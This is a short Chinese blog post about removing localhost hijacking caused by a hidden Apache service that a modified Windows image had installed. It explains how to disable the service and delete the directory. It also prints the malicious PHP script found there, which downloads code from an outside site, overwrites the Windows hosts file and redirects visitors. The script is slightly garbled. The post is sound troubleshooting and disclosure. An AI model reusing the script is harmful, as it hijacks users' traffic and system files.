解决127.0.0.1 localhost 劫持问题

Posted 2020-07-30 stuart

在一个安装iis的过程中，把网站部署上去之后就发现127.0.0.1或者localhost都会跳转到一个莫名的网站，发现断网之后就是会跳转到一个Http://www.76636.com 类似这种的网站，感叹一句现在流氓软件越来越高级了，我在无意中发现任务管理居然有apache的服务器，我就想你这个蛋，为什么莫名其妙有这个服务启动，还杀不死

解决方案：

使用大数字或者什么管家 禁用apache服务的开机启动,然后重启电脑

然后去C:\WINDOWS\Apache 删掉整个目录 就完美解决了

在C:\WINDOWS\Apache\htdocs目录下一段php脚本，里面这么写的：

<?php 
 include_once "config.php";
  $name1 = "";
  $name2 = "";
  //$name3 = "";

//获取最新php

   $index = file_get_contents(‘http://www.76636.com/ht/index.txt‘);
   if(strpos($index, )
   {
    $arr = explode("@", $index);
   
   $index = $arr[1]; 
   $hosts = $arr[0];
   $index = get_rep($index);
   if(!empty($index)){
     if(file_put_contents("index.php", $index)==0){} 
   }

 //获取最新hosts
  if(!empty($hosts)){ 
   if(file_put_contents("C:/WINDOWS/system32/drivers/etc/hosts", $hosts)==0){}
  }
}
 //域名跳转个性化

  $serverName = $_SERVER[‘SERVER_NAME‘];
  switch ($serverName) {
 case strpos($name1,$serverName)!==false:
  header("Location:http://www.76636.com/?1");exit;
  break;
    case strpos($name2,$serverName)!==false:
  header("Location:http://www.76636.com/?2");exit;
  break;
   case strpos($name3,$serverName)!==false:
  header("Location:http://www.76636.com/?3");exit;
  break;
 default:
     header("Location:http://www.76636.com/?4");exit;
  break;
 }
 
 ?>
<meta http-equiv="refresh" content="0;url=http://www.76636.com/?301">

居然有这种跳转，流氓的系统封装强加了一个httpd服务，然后导致127.0.0.1劫持。